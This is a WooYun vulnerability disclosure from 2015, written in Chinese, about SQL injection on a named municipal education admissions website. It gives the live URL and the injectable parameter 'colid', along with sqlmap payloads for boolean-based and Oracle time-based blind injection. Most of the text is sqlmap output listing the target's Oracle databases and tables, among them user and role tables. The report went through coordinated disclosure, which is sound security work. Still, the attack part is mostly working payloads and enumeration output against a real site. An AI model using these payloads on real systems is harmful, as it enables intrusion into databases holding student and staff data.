某市教育招生考试院网站存在SQL注入导致信息泄露

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-090360

漏洞标题：某市教育招生考试院网站存在SQL注入导致信息泄露

漏洞作者： Yang

提交时间：2015-01-07 12:23

修复时间：2015-02-21 12:24

公开时间：2015-02-21 12:24

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：12

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-01-07：细节已通知厂商并且等待厂商处理中
2015-01-12：厂商已经确认，细节仅向厂商公开
2015-01-22：细节向核心白帽子及相关领域专家公开
2015-02-01：细节向普通白帽子公开
2015-02-11：细节向实习白帽子公开
2015-02-21：细节向公众公开

简要描述：

某市教育招生考试院网站存在SQL注入导致信息泄露

详细说明：

自己找的，后来在乌云搜了一下，有人提交了。 WooYun: 某市教育招生考试院网站存在SQL注入导致学生信息泄露风险
但是参数不同，所以我也提交了。。
前人提交的参数为oid
本人提交的链接为：http://www.zhaokao.net/pingjia_pic.jsp?pid=0&colid=18496
参数为colid

Place: GET
Parameter: colid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: pid=0&colid=18496) AND 2597=2597 AND (7497=7497
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: pid=0&colid=18496) AND 3035=DBMS_PIPE.RECEIVE_MESSAGE(CHR(70)||CHR(66)||CHR(72)||CHR(101),5) AND (5313=5313
---
web application technology: JSP
back-end DBMS: Oracle

available databases [25]:
[*] CTXSYS
[*] HR
[*] MDSYS
[*] ODM
[*] ODM_MTR
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] QS
[*] QS_CBADM
[*] QS_CS
[*] QS_ES
[*] QS_OS
[*] QS_WS
[*] RMAN
[*] SCOTT
[*] SH
[*] SYS
[*] SYSTEM
[*] VCMS
[*] WKSYS
[*] WMSYS
[*] XDB

跑了几天，由于网速关系，今天终于把表名跑出来了

Database: QS_OS
[14 tables]
+--------------------------------+
| AQ$_QS_OS_ORDERS_MQTAB_H       |
| AQ$_QS_OS_ORDERS_MQTAB_I       |
| AQ$_QS_OS_ORDERS_MQTAB_NR      |
| AQ$_QS_OS_ORDERS_MQTAB_S       |
| AQ$_QS_OS_ORDERS_MQTAB_T       |
| AQ$_QS_OS_ORDERS_PR_MQTAB_H    |
| AQ$_QS_OS_ORDERS_PR_MQTAB_I    |
| AQ$_QS_OS_ORDERS_PR_MQTAB_NR   |
| AQ$_QS_OS_ORDERS_PR_MQTAB_S    |
| AQ$_QS_OS_ORDERS_PR_MQTAB_T    |
| QS_OS_ORDERS_MQTAB             |
| QS_OS_ORDERS_PR_MQTAB          |
| SYS_IOT_OVER_30015             |
| SYS_IOT_OVER_30033             |
+--------------------------------+
Database: WKSYS
[38 tables]
+--------------------------------+
| SYS_IOT_OVER_27796             |
| SYS_IOT_OVER_27912             |
| WK$CHARSET                     |
| WK$CRAWLER_CONFIG_DEFAULT      |
| WK$INSTANCE                    |
| WK$INST_ADMIN                  |
| WK$LANG                        |
| WK$MIMETYPES                   |
| WK$SNP_DEP                     |
| WK$SNP_TAB                     |
| WK$SUBSCRIBER                  |
| WK$SYS_CONFIG                  |
| WK$SYS_PRIV                    |
| WK$_ATTR_MAPPING               |
| WK$_ATTR_USAGE                 |
| WK$_AUTHBASIC                  |
| WK$_CRAWLER_CONFIG             |
| WK$_CRAWLER_SCHED              |
| WK$_CRAWLER_STAT               |
| WK$_DATA_SOURCE                |
| WK$_DATA_SOURCE_PARAM          |
| WK$_DATA_SOURCE_PARAM_VAL      |
| WK$_DATA_SOURCE_TYPE           |
| WK$_DOC_ATTR                   |
| WK$_GROUP_DS_MAPPING           |
| WK$_JOB_INFO                   |
| WK$_MAILLIST                   |
| WK$_PORTAL                     |
| WK$_PORTAL_DS_MAP              |
| WK$_SCHED_MAPPING              |
| WK$_SEARCH_ATTR                |
| WK$_SEARCH_ATTR_TL             |
| WK$_SOURCE_GROUP               |
| WK$_SOURCE_GROUP_TL            |
| WK$_SYSINFO                    |
| WK$_SYS_ADMIN                  |
| WK$_TDS_LOG                    |
| WK$_TRACE                      |
+--------------------------------+
Database: ORDSYS
[5 tables]
+--------------------------------+
| JACCELERATOR$DLLS              |
| JACCELERATOR$DLL_ERRORS        |
| JACCELERATOR$STATUS            |
| ORD_CARTRIDGE_COMPONENTS       |
| ORD_INSTALLATIONS              |
+--------------------------------+
Database: HR
[7 tables]
+--------------------------------+
| COUNTRIES                      |
| DEPARTMENTS                    |
| EMPLOYEES                      |
| JOBS                           |
| JOB_HISTORY                    |
| LOCATIONS                      |
| REGIONS                        |
+--------------------------------+
Database: OLAPSYS
[58 tables]
+--------------------------------+
| CWM$ARGUMENT                   |
| CWM$CLASSIFICATION             |
| CWM$CLASSIFICATIONENTRY        |
| CWM$CLASSIFICATIONTYPE         |
| CWM$CUBE                       |
| CWM$CUBEDIMENSIONUSE           |
| CWM$DIMENSION                  |
| CWM$DIMENSIONATTRIBUTE         |
| CWM$DOMAIN                     |
| CWM$FACTLEVELGROUP             |
| CWM$FACTLEVELUSE               |
| CWM$FACTTABLEMAP               |
| CWM$FACTUSE                    |
| CWM$FUNCTION                   |
| CWM$FUNCTIONUSE                |
| CWM$HIERARCHY                  |
| CWM$ITEMMAP                    |
| CWM$ITEMUSE                    |
| CWM$LEVEL                      |
| CWM$LEVELATTRIBUTE             |
| CWM$MEASURE                    |
| CWM$MEASUREDIMENSIONUSE        |
| CWM$MODEL                      |
| CWM$OBJECTTYPE                 |
| CWM$PARAMETER                  |
| CWM$PROJECT                    |
| CWM2$AWLOGICALATTRUSE          |
| CWM2$AWLOGICALDIMUSE           |
| CWM2$AWLOGICALHIERUSE          |
| CWM2$AWLOGICALLEVELUSE         |
| CWM2$AWLOGICALMEASUSE          |
| CWM2$AWLOGICALOBJLIMITSETUSE   |
| CWM2$AWPHYSICALOBJ             |
| CWM2$AWPHYSICALOBJEXT          |
| CWM2$AWPHYSICALOBJPROPS        |
| CWM2$AWPHYSICALOBJRELATEDOBJS  |
| CWM2$AW_DIMENSIONMAP           |
| CWM2$AW_MEASUREMAP             |
| CWM2$CUBE                      |
| CWM2$CUBEDIMENSIONUSE          |
| CWM2$DIMENSION                 |
| CWM2$DIMENSIONATTRIBUTE        |
| CWM2$DIMHIERLVLMAP             |
| CWM2$FACTDIMHIERMAP            |
| CWM2$FACTDIMHIERTPLSDTL        |
| CWM2$FACTKEYDIMHIERLVLMAP      |
| CWM2$FACTKEYDIMHIERMAP         |
| CWM2$HIERARCHY                 |
| CWM2$HIERCUSTOMSORT            |
| CWM2$HIERLEVELREL              |
| CWM2$LEVEL                     |
| CWM2$LEVELATTRIBUTE            |
| CWM2$LEVELATTRIBUTEMAP         |
| CWM2$MEASURE                   |
| CWM2$MEASURETABLEMAP           |
| CWM2$OLAPMANAGERTABLE          |
| CWM2$STOREDDIMLVLTPLS          |
| CWM2$STOREDDIMLVLTPLSDTL       |
+--------------------------------+
Database: OUTLN
[3 tables]
+--------------------------------+
| OL$                            |
| OL$HINTS                       |
| OL$NODES                       |
+--------------------------------+
Database: XDB
[5 tables]
+--------------------------------+
| XDB$CHECKOUTS                  |
| XDB$COLUMN_INFO                |
| XDB$H_INDEX                    |
| XDB$PATH_INDEX_PARAMS          |
| XDB$ROOT_INFO                  |
+--------------------------------+
Database: QS_CS
[8 tables]
+--------------------------------+
| AQ$_QS_CS_ORDER_STATUS_QT_H    |
| AQ$_QS_CS_ORDER_STATUS_QT_I    |
| AQ$_QS_CS_ORDER_STATUS_QT_NR   |
| AQ$_QS_CS_ORDER_STATUS_QT_S    |
| AQ$_QS_CS_ORDER_STATUS_QT_T    |
| ORDER_STATUS_TABLE             |
| QS_CS_ORDER_STATUS_QT          |
| SYS_IOT_OVER_30090             |
+--------------------------------+
Database: MDSYS
[18 tables]
+--------------------------------+
| CS_SRS                         |
| MD$RELATE                      |
| OGIS_GEOMETRY_COLUMNS          |
| OGIS_SPATIAL_REFERENCE_SYSTEMS |
| SDO_ANGLE_UNITS                |
| SDO_AREA_UNITS                 |
| SDO_DATUMS                     |
| SDO_DIST_UNITS                 |
| SDO_ELLIPSOIDS                 |
| SDO_GEOM_METADATA_TABLE        |
| SDO_INDEX_METADATA_TABLE       |
| SDO_LRS_METADATA_TABLE         |
| SDO_MAPS_TABLE                 |
| SDO_PROJECTIONS                |
| SDO_STYLES_TABLE               |
| SDO_THEMES_TABLE               |
| USER_CS_SRS                    |
| USER_TRANSFORM_MAP             |
+--------------------------------+
Database: ODM
[25 tables]
+--------------------------------+
| CREATE$JAVA$LOB$TABLE          |
| DMS_QUEUE_TABLE                |
| JAVA$CLASS$MD5$TABLE           |
| ODM_APPLY_RESULT               |
| ODM_A_I_MODEL                  |
| ODM_CATEGORY_MATRIX_ENTRY      |
| ODM_CLASSIFICATION_TEST_RESULT |
| ODM_CONFIGURATION              |
| ODM_ERROR_TABLE                |
| ODM_INTERNAL_CONFIGURATION     |
| ODM_ITEM_PRIOR                 |
| ODM_I_I_ANTECEDENT             |
| ODM_I_I_RULE                   |
| ODM_LIFT_RESULT                |
| ODM_LIFT_RESULT_ENTRY          |
| ODM_MESSAGE_LOG                |
| ODM_MINING_FUNCTION_SETTINGS   |
| ODM_MINING_MODEL               |
| ODM_MINING_TASK                |
| ODM_MINING_TASK_STATE          |
| ODM_MODEL_SEEKER_RESULT        |
| ODM_MS_RESULT_ENTRY            |
| ODM_PMML_DTD                   |
| ODM_P_I_ITEM_RULES             |
| ODM_TEST_RESULT                |
+--------------------------------+
Database: QS_CBADM
[8 tables]
+--------------------------------+
| AQ$_QS_CBADM_ORDERS_MQTAB_H    |
| AQ$_QS_CBADM_ORDERS_MQTAB_I    |
| AQ$_QS_CBADM_ORDERS_MQTAB_NR   |
| AQ$_QS_CBADM_ORDERS_MQTAB_S    |
| AQ$_QS_CBADM_ORDERS_MQTAB_T    |
| QS_CBADM_ORDERS_MQTAB          |
| QS_CBADM_ORDERS_SQTAB          |
| SYS_IOT_OVER_30066             |
+--------------------------------+
Database: CTXSYS
[36 tables]
+--------------------------------+
| DR$CLASS                       |
| DR$DELETE                      |
| DR$INDEX                       |
| DR$INDEX_ERROR                 |
| DR$INDEX_OBJECT                |
| DR$INDEX_PARTITION             |
| DR$INDEX_SET                   |
| DR$INDEX_SET_INDEX             |
| DR$INDEX_VALUE                 |
| DR$OBJECT                      |
| DR$OBJECT_ATTRIBUTE            |
| DR$OBJECT_ATTRIBUTE_LOV        |
| DR$ONLINE_PENDING              |
| DR$PARALLEL                    |
| DR$PARAMETER                   |
| DR$PART_STATS                  |
| DR$PENDING                     |
| DR$POLICY_TAB                  |
| DR$PREFERENCE                  |
| DR$PREFERENCE_VALUE            |
| DR$SECTION                     |
| DR$SECTION_GROUP               |
| DR$SERVER                      |
| DR$SQE                         |
| DR$STATS                       |
| DR$STOPLIST                    |
| DR$STOPWORD                    |
| DR$SUB_LEXER                   |
| DR$THS                         |
| DR$THS_BT                      |
| DR$THS_FPHRASE                 |
| DR$THS_PHRASE                  |
| DR$UNINDEXED                   |
| DR$WAITING                     |
| SYS_IOT_OVER_26472             |
| SYS_IOT_OVER_26567             |
+--------------------------------+
Database: VCMS
[31 tables]
+--------------------------------+
| CODES                          |
| DAGANG                         |
| DEPARTMENT                     |
| FUNS                           |
| FUNS_BAK                       |
| KCMX                           |
| KCMX_BAK                       |
| MESSAGE                        |
| MYZXJG                         |
| ROLEFUNS                       |
| ROLES                          |
| ROLEUSERS                      |
| SEQUENCE                       |
| USERS                          |
| WEB_ADVISE                     |
| WEB_ADVISE                     |
| WEB_COLUMN                     |
| WEB_DIRECTORMAIL               |
| WEB_DISTRICT                   |
| WEB_DOWNLOAD                   |
| WEB_DOWNLOADTYPE               |
| WEB_FEEDBACK                   |
| WEB_NEWS                       |
| WEB_SITE                       |
| WEB_STATCOLUMN                 |
| WEB_USERCOLUMN                 |
| ZKYX                           |
| ZKZY_NEW                       |
| ZKZY_NEW_BAK                   |
| ZSPX                           |
| ZXJGANDZHUANYE                 |
+--------------------------------+
Database: QS_ES
[14 tables]
+--------------------------------+
| AQ$_QS_ES_ORDERS_MQTAB_H       |
| AQ$_QS_ES_ORDERS_MQTAB_I       |
| AQ$_QS_ES_ORDERS_MQTAB_NR      |
| AQ$_QS_ES_ORDERS_MQTAB_S       |
| AQ$_QS_ES_ORDERS_MQTAB_T       |
| AQ$_QS_ES_ORDERS_PR_MQTAB_H    |
| AQ$_QS_ES_ORDERS_PR_MQTAB_I    |
| AQ$_QS_ES_ORDERS_PR_MQTAB_NR   |
| AQ$_QS_ES_ORDERS_PR_MQTAB_S    |
| AQ$_QS_ES_ORDERS_PR_MQTAB_T    |
| QS_ES_ORDERS_MQTAB             |
| QS_ES_ORDERS_PR_MQTAB          |
| SYS_IOT_OVER_29925             |
| SYS_IOT_OVER_29943             |
+--------------------------------+
Database: PM
[2 tables]
+--------------------------------+
| ONLINE_MEDIA                   |
| PRINT_MEDIA                    |
+--------------------------------+
Database: RMAN
[30 tables]
+--------------------------------+
| AL                             |
| BCB                            |
| BCF                            |
| BDF                            |
| BP                             |
| BRL                            |
| BS                             |
| BSF                            |
| CCB                            |
| CCF                            |
| CDF                            |
| CKP                            |
| CONF                           |
| CONFIG                         |
| DB                             |
| DBINC                          |
| DF                             |
| DFATT                          |
| OFFR                           |
| ORL                            |
| RCVER                          |
| RLH                            |
| RR                             |
| RT                             |
| SCR                            |
| SCRL                           |
| TS                             |
| TSATT                          |
| XCF                            |
| XDF                            |
+--------------------------------+
Database: QS
[15 tables]
+--------------------------------+
| AQ$_AQ$_MEM_MC_H               |
| AQ$_AQ$_MEM_MC_I               |
| AQ$_AQ$_MEM_MC_NR              |
| AQ$_AQ$_MEM_MC_S               |
| AQ$_AQ$_MEM_MC_T               |
| AQ$_MEM_MC                     |
| AQ$_QS_ORDERS_PR_MQTAB_H       |
| AQ$_QS_ORDERS_PR_MQTAB_I       |
| AQ$_QS_ORDERS_PR_MQTAB_NR      |
| AQ$_QS_ORDERS_PR_MQTAB_S       |
| AQ$_QS_ORDERS_PR_MQTAB_T       |
| QS_ORDERS_PR_MQTAB             |
| QS_ORDERS_SQTAB                |
| SYS_IOT_OVER_29881             |
| SYS_IOT_OVER_29906             |
+--------------------------------+
Database: QS_WS
[14 tables]
+--------------------------------+
| AQ$_QS_WS_ORDERS_MQTAB_H       |
| AQ$_QS_WS_ORDERS_MQTAB_I       |
| AQ$_QS_WS_ORDERS_MQTAB_NR      |
| AQ$_QS_WS_ORDERS_MQTAB_S       |
| AQ$_QS_WS_ORDERS_MQTAB_T       |
| AQ$_QS_WS_ORDERS_PR_MQTAB_H    |
| AQ$_QS_WS_ORDERS_PR_MQTAB_I    |
| AQ$_QS_WS_ORDERS_PR_MQTAB_NR   |
| AQ$_QS_WS_ORDERS_PR_MQTAB_S    |
| AQ$_QS_WS_ORDERS_PR_MQTAB_T    |
| QS_WS_ORDERS_MQTAB             |
| QS_WS_ORDERS_PR_MQTAB          |
| SYS_IOT_OVER_29970             |
| SYS_IOT_OVER_29988             |
+--------------------------------+
Database: OE
[9 tables]
+--------------------------------+
| CUSTOMERS                      |
| INVENTORIES                    |
| ORDERS                         |
| ORDER_ITEMS                    |
| PRODUCT_DESCRIPTIONS           |
| PRODUCT_INFORMATION            |
| PRODUCT_REF_LIST_NESTEDTAB     |
| SUBCATEGORY_REF_LIST_NESTEDTAB |
| WAREHOUSES                     |
+--------------------------------+
Database: SYSTEM
[130 tables]
+--------------------------------+
| AQ$_INTERNET_AGENTS            |
| AQ$_INTERNET_AGENT_PRIVS       |
| AQ$_QUEUES                     |
| AQ$_QUEUE_TABLES               |
| AQ$_SCHEDULES                  |
| DEF$_AQCALL                    |
| DEF$_AQERROR                   |
| DEF$_CALLDEST                  |
| DEF$_DEFAULTDEST               |
| DEF$_DESTINATION               |
| DEF$_ERROR                     |
| DEF$_LOB                       |
| DEF$_ORIGIN                    |
| DEF$_PROPAGATOR                |
| DEF$_PUSHED_TRANSACTIONS       |
| DEF$_TEMP$LOB                  |
| HELP                           |
| LOGMNRC_DBNAME_UID_MAP         |
| LOGMNRC_GSII                   |
| LOGMNRC_GTCS                   |
| LOGMNRC_GTLO                   |
| LOGMNR_AGE_SPILL$              |
| LOGMNR_ATTRCOL$                |
| LOGMNR_ATTRIBUTE$              |
| LOGMNR_CCOL$                   |
| LOGMNR_CDEF$                   |
| LOGMNR_COL$                    |
| LOGMNR_COLTYPE$                |
| LOGMNR_DICTIONARY$             |
| LOGMNR_DICTSTATE$              |
| LOGMNR_HEADER1$                |
| LOGMNR_HEADER2$                |
| LOGMNR_ICOL$                   |
| LOGMNR_IND$                    |
| LOGMNR_INDCOMPART$             |
| LOGMNR_INDPART$                |
| LOGMNR_INDSUBPART$             |
| LOGMNR_LOB$                    |
| LOGMNR_LOBFRAG$                |
| LOGMNR_LOG$                    |
| LOGMNR_OBJ$                    |
| LOGMNR_PROCESSED_LOG$          |
| LOGMNR_RESTART_CKPT$           |
| LOGMNR_RESTART_CKPT_TXINFO$    |
| LOGMNR_SESSION$                |
| LOGMNR_SPILL$                  |
| LOGMNR_TAB$                    |
| LOGMNR_TABCOMPART$             |
| LOGMNR_TABPART$                |
| LOGMNR_TABSUBPART$             |
| LOGMNR_TS$                     |
| LOGMNR_TYPE$                   |
| LOGMNR_UID$                    |
| LOGMNR_USER$                   |
| LOGSTDBY$APPLY_MILESTONE       |
| LOGSTDBY$APPLY_PROGRESS        |
| LOGSTDBY$EVENTS                |
| LOGSTDBY$PARAMETERS            |
| LOGSTDBY$PLSQL                 |
| LOGSTDBY$SCN                   |
| LOGSTDBY$SKIP                  |
| LOGSTDBY$SKIP_SUPPORT          |
| LOGSTDBY$SKIP_TRANSACTION      |
| MVIEW$_ADV_AJG                 |
| MVIEW$_ADV_BASETABLE           |
| MVIEW$_ADV_CLIQUE              |
| MVIEW$_ADV_ELIGIBLE            |
| MVIEW$_ADV_EXCEPTIONS          |
| MVIEW$_ADV_FILTER              |
| MVIEW$_ADV_FILTERINSTANCE      |
| MVIEW$_ADV_FJG                 |
| MVIEW$_ADV_GC                  |
| MVIEW$_ADV_INDEX               |
| MVIEW$_ADV_INFO                |
| MVIEW$_ADV_JOURNAL             |
| MVIEW$_ADV_LEVEL               |
| MVIEW$_ADV_LOG                 |
| MVIEW$_ADV_OUTPUT              |
| MVIEW$_ADV_PARAMETERS          |
| MVIEW$_ADV_PARTITION           |
| MVIEW$_ADV_PLAN                |
| MVIEW$_ADV_PRETTY              |
| MVIEW$_ADV_ROLLUP              |
| MVIEW$_ADV_SQLDEPEND           |
| MVIEW$_ADV_TEMP                |
| MVIEW$_ADV_WORKLOAD            |
| REPCAT$_AUDIT_ATTRIBUTE        |
| REPCAT$_AUDIT_COLUMN           |
| REPCAT$_COLUMN_GROUP           |
| REPCAT$_CONFLICT               |
| REPCAT$_DDL                    |
| REPCAT$_EXCEPTIONS             |
| REPCAT$_EXTENSION              |
| REPCAT$_FLAVORS                |
| REPCAT$_FLAVOR_OBJECTS         |
| REPCAT$_GENERATED              |
| REPCAT$_GROUPED_COLUMN         |
| REPCAT$_INSTANTIATION_DDL      |
| REPCAT$_KEY_COLUMNS            |
| REPCAT$_OBJECT_PARMS           |
| REPCAT$_OBJECT_TYPES           |
| REPCAT$_PARAMETER_COLUMN       |
| REPCAT$_PRIORITY               |
| REPCAT$_PRIORITY_GROUP         |
| REPCAT$_REFRESH_TEMPLATES      |
| REPCAT$_REPCAT                 |
| REPCAT$_REPCATLOG              |
| REPCAT$_REPCOLUMN              |
| REPCAT$_REPGROUP_PRIVS         |
| REPCAT$_REPOBJECT              |
| REPCAT$_REPPROP                |
| REPCAT$_REPSCHEMA              |
| REPCAT$_RESOLUTION             |
| REPCAT$_RESOLUTION_METHOD      |
| REPCAT$_RESOLUTION_STATISTICS  |
| REPCAT$_RESOL_STATS_CONTROL    |
| REPCAT$_RUNTIME_PARMS          |
| REPCAT$_SITES_NEW              |
| REPCAT$_SITE_OBJECTS           |
| REPCAT$_SNAPGROUP              |
| REPCAT$_TEMPLATE_OBJECTS       |
| REPCAT$_TEMPLATE_PARMS         |
| REPCAT$_TEMPLATE_REFGROUPS     |
| REPCAT$_TEMPLATE_SITES         |
| REPCAT$_TEMPLATE_STATUS        |
| REPCAT$_TEMPLATE_TARGETS       |
| REPCAT$_TEMPLATE_TYPES         |
| REPCAT$_USER_AUTHORIZATIONS    |
| REPCAT$_USER_PARM_VALUES       |
| SQLPLUS_PRODUCT_PROFILE        |
+--------------------------------+
Database: SYS
[341 tables]
+--------------------------------+
| DUAL                           |
| ACCESS$                        |
| APPLY$_CONF_HDLR_COLUMNS       |
| APPLY$_DEST_OBJ                |
| APPLY$_DEST_OBJ_CMAP           |
| APPLY$_DEST_OBJ_OPS            |
| APPLY$_ERROR                   |
| APPLY$_ERROR_HANDLER           |
| APPLY$_SOURCE_OBJ              |
| APPLY$_SOURCE_SCHEMA           |
| APPROLE$                       |
| AQ$_MESSAGE_TYPES              |
| AQ$_PENDING_MESSAGES           |
| AQ$_PROPAGATION_STATUS         |
| AQ$_PUBLISHER                  |
| AQ$_QUEUE_STATISTICS           |
| AQ$_QUEUE_TABLE_AFFINITIES     |
| AQ$_REPLAY_INFO                |
| AQ$_SCHEDULES                  |
| AQ_EVENT_TABLE                 |
| AQ_SRVNTFN_TABLE               |
| ARGUMENT$                      |
| ASSOCIATION$                   |
| ATEMPTAB$                      |
| ATTRCOL$                       |
| ATTRIBUTE$                     |
| ATTRIBUTE_TRANSFORMATIONS$     |
| AUD$                           |
| AUDIT$                         |
| AUDIT_ACTIONS                  |
| AURORA$SHUTDOWN$CLASSES$       |
| AURORA$STARTUP$CLASSES$        |
| AUX_STATS$                     |
| AW$                            |
| AW$CWMTOECM                    |
| AW$EXPRESS                     |
| BOOTSTRAP$                     |
| CCOL$                          |
| CDC_CHANGE_COLUMNS$            |
| CDC_CHANGE_SETS$               |
| CDC_CHANGE_SOURCES$            |
| CDC_CHANGE_TABLES$             |
| CDC_SUBSCRIBED_COLUMNS$        |
| CDC_SUBSCRIBED_TABLES$         |
| CDC_SUBSCRIBERS$               |
| CDC_SYSTEM$                    |
| CDEF$                          |
| CLU$                           |
| COL$                           |
| COLLECTION$                    |
| COLTYPE$                       |
| COL_USAGE$                     |
| COM$                           |
| CON$                           |
| CONTEXT$                       |
| DBMS_ALERT_INFO                |
| DBMS_LOCK_ALLOCATED            |
| DEFROLE$                       |
| DEFSUBPART$                    |
| DEFSUBPARTLOB$                 |
| DEPENDENCY$                    |
| DIM$                           |
| DIMATTR$                       |
| DIMJOINKEY$                    |
| DIMLEVEL$                      |
| DIMLEVELKEY$                   |
| DIR$                           |
| DUC$                           |
| ERROR$                         |
| EXPACT$                        |
| EXPDEPACT$                     |
| EXPDEPOBJ$                     |
| EXPPKGACT$                     |
| EXPPKGOBJ$                     |
| EXTERNAL_LOCATION$             |
| EXTERNAL_TAB$                  |
| FET$                           |
| FGA$                           |
| FGA_LOG$                       |
| FILE$                          |
| HIER$                          |
| HIERLEVEL$                     |
| HISTGRM$                       |
| HIST_HEAD$                     |
| HS$_BASE_CAPS                  |
| HS$_BASE_DD                    |
| HS$_CLASS_CAPS                 |
| HS$_CLASS_DD                   |
| HS$_CLASS_INIT                 |
| HS$_FDS_CLASS                  |
| HS$_FDS_CLASS_DATE             |
| HS$_FDS_INST                   |
| HS$_INST_CAPS                  |
| HS$_INST_DD                    |
| HS$_INST_INIT                  |
| ICOL$                          |
| ICOLDEP$                       |
| IDL_CHAR$                      |
| IDL_SB4$                       |
| IDL_UB1$                       |
| IDL_UB2$                       |
| ID_GENS$                       |
| INCEXP                         |
| INCFIL                         |
| INCVID                         |
| IND$                           |
| INDCOMPART$                    |
| INDOP$                         |
| INDPART$                       |
| INDPART_PARAM$                 |
| INDSUBPART$                    |
| INDTYPES$                      |
| JACCELERATOR$DLLS              |
| JACCELERATOR$DLL_ERRORS        |
| JACCELERATOR$STATUS            |
| JAVA$JVM$STATUS                |
| JAVA$JVM$STEPS$DONE            |
| JAVA$POLICY$                   |
| JAVA$POLICY$SHARED$TABLE       |
| JAVA$RMJVM$AUX                 |
| JAVA$RMJVM$AUX2                |
| JAVA$RMJVM$AUX3                |
| JAVASNM$                       |
| JIJOIN$                        |
| JIREFRESHSQL$                  |
| JOB$                           |
| KOPM$                          |
| LIBRARY$                       |
| LINK$                          |
| LOB$                           |
| LOBCOMPPART$                   |
| LOBFRAG$                       |
| LOC$                           |
| LOG$                           |
| LOGMNRG_ATTRCOL$               |
| LOGMNRG_ATTRIBUTE$             |
| LOGMNRG_CCOL$                  |
| LOGMNRG_CDEF$                  |
| LOGMNRG_COL$                   |
| LOGMNRG_COLTYPE$               |
| LOGMNRG_DICTIONARY$            |
| LOGMNRG_ICOL$                  |
| LOGMNRG_IND$                   |
| LOGMNRG_INDCOMPART$            |
| LOGMNRG_INDPART$               |
| LOGMNRG_INDSUBPART$            |
| LOGMNRG_LOB$                   |
| LOGMNRG_LOBFRAG$               |
| LOGMNRG_OBJ$                   |
| LOGMNRG_SEED$                  |
| LOGMNRG_TAB$                   |
| LOGMNRG_TABCOMPART$            |
| LOGMNRG_TABPART$               |
| LOGMNRG_TABSUBPART$            |
| LOGMNRG_TS$                    |
| LOGMNRG_TYPE$                  |
| LOGMNRG_USER$                  |
| LOGMNRT_ATTRCOL$               |
| LOGMNRT_ATTRIBUTE$             |
| LOGMNRT_CCOL$                  |
| LOGMNRT_CDEF$                  |
| LOGMNRT_COL$                   |
| LOGMNRT_COLTYPE$               |
| LOGMNRT_DICTIONARY$            |
| LOGMNRT_ICOL$                  |
| LOGMNRT_IND$                   |
| LOGMNRT_INDCOMPART$            |
| LOGMNRT_INDPART$               |
| LOGMNRT_INDSUBPART$            |
| LOGMNRT_LOB$                   |
| LOGMNRT_LOBFRAG$               |
| LOGMNRT_OBJ$                   |
| LOGMNRT_SEED$                  |
| LOGMNRT_TAB$                   |
| LOGMNRT_TABCOMPART$            |
| LOGMNRT_TABPART$               |
| LOGMNRT_TABSUBPART$            |
| LOGMNRT_TS$                    |
| LOGMNRT_TYPE$                  |
| LOGMNRT_USER$                  |
| LOGMNR_BUILDLOG                |
| LOGMNR_INTERESTING_COLS        |
| MAP_COMPLIST$                  |
| MAP_ELEMENT$                   |
| MAP_EXTELEMENT$                |
| MAP_FILE$                      |
| MAP_FILE_EXTENT$               |
| MAP_OBJECT                     |
| MAP_SUBELEMENT$                |
| METAFILTER$                    |
| METASTYLESHEET                 |
| METAVIEW$                      |
| METAXSL$                       |
| METAXSLPARAM$                  |
| METHOD$                        |
| MIGRATE$                       |
| MLOG$                          |
| MLOG_REFCOL$                   |
| MON_MODS$                      |
| NOEXP$                         |
| NTAB$                          |
| OBJ$                           |
| OBJAUTH$                       |
| OBJECT_USAGE                   |
| OBJPRIV$                       |
| ODCI_SECOBJ$                   |
| ODCI_WARNINGS$                 |
| OID$                           |
| OLAP$ALTER_SESSION             |
| OLAPTABLEVELS                  |
| OLAPTABLEVELTUPLES             |
| OPANCILLARY$                   |
| OPARG$                         |
| OPBINDING$                     |
| OPERATOR$                      |
| OPQTYPE$                       |
| PARAMETER$                     |
| PARTCOL$                       |
| PARTLOB$                       |
| PARTOBJ$                       |
| PENDING_SESSIONS$              |
| PENDING_SUB_SESSIONS$          |
| PENDING_TRANS$                 |
| PROCEDURE$                     |
| PROCEDUREC$                    |
| PROCEDUREINFO$                 |
| PROCEDUREJAVA$                 |
| PROFILE$                       |
| PROFNAME$                      |
| PROPS$                         |
| PROXY_DATA$                    |
| PROXY_ROLE_DATA$               |
| PRVT_EPGCTAB_ADMIN             |
| PRVT_EPGCTAB_DAD               |
| PRVT_EPGCTAB_DAD_ATTRS         |
| PRVT_EPGCTAB_GLOBALS           |
| PRVT_EPGCTAB_PORTS             |
| PS$                            |
| PSTUBTBL                       |
| REC_TAB$                       |
| REC_VAR$                       |
| REFCON$                        |
| REG$                           |
| REGISTRY$                      |
| REG_SNAP$                      |
| RESOURCE_CONSUMER_GROUP$       |
| RESOURCE_COST$                 |
| RESOURCE_MAP                   |
| RESOURCE_PLAN$                 |
| RESOURCE_PLAN_DIRECTIVE$       |
| RESULT$                        |
| RGCHILD$                       |
| RGROUP$                        |
| RLS$                           |
| RLS_CTX$                       |
| RLS_GRP$                       |
| RULE$                          |
| RULESET$                       |
| RULE_EC$                       |
| RULE_MAP$                      |
| RULE_SET$                      |
| SECOBJ$                        |
| SEG$                           |
| SEQ$                           |
| SETTINGS$                      |
| SLOG$                          |
| SMON_SCN_TIME                  |
| SNAP$                          |
| SNAP_COLMAP$                   |
| SNAP_LOADERTIME$               |
| SNAP_LOGDEP$                   |
| SNAP_OBJCOL$                   |
| SNAP_REFOP$                    |
| SNAP_REFTIME$                  |
| SNAP_SITE$                     |
| SOURCE$                        |
| SQL_VERSION$                   |
| STMT_AUDIT_OPTION_MAP          |
| STREAMS$_APPLY_MILESTONE       |
| STREAMS$_APPLY_PROCESS         |
| STREAMS$_APPLY_PROGRESS        |
| STREAMS$_CAPTURE_PROCESS       |
| STREAMS$_DEF_PROC              |
| STREAMS$_KEY_COLUMNS           |
| STREAMS$_PREPARE_DDL           |
| STREAMS$_PREPARE_OBJECT        |
| STREAMS$_PROCESS_PARAMS        |
| STREAMS$_PROPAGATION_PROCESS   |
| STREAMS$_RULES                 |
| SUBCOLTYPE$                    |
| SUBPARTCOL$                    |
| SUM$                           |
| SUMAGG$                        |
